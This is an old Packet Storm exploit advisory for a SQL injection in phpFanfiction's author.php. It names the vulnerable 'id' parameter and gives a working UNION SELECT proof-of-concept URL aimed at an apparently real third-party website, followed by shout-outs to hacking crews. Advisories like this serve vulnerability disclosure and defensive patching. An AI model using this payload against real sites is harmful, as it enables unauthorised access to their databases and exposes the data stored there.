phpFanfiction SQL Injection

2009-06-29T00:00:00
ID PACKETSTORM:78734
Type packetstorm
Reporter S3T4N
Modified 2009-06-29T00:00:00

Description

                                        
                                            `#***************************************************************#  
#Title : phpFanfiction [Remote SQL injection]  
#***************************************************************#  
#Software : phpFanfiction  
#Date : 06/27/2009  
#Author : S3T4N  
#Contact : root[at]sux0r.net  
#Blog : http://sux0r.net  
#***************************************************************#  
#[o]Vulnerable file  
#author.php  
#***************************************************************#  
#[o] Exploit  
#http://target/author.php?id=[SQL]  
#***************************************************************#  
#[o] POC  
#http://shitennou.com/author.php?id=-1%20union%20select%201,2,3,4,version(),6,7--  
#***************************************************************#  
#[o] Greetz  
#www.MainHack.com - www.ServerIsDown.org - www.sux0r.net  
#VOP Crew [Vaksin13 * OoN_Boy * Paman]  
#R3VAN_BASTARD * Kecemplungkalen * eminem *  
#zxvf * Pizzyroot * iwannine  
#Jupe Crew [makasih buat ngenet gratisnya wkwkwk]  
#***************************************************************#`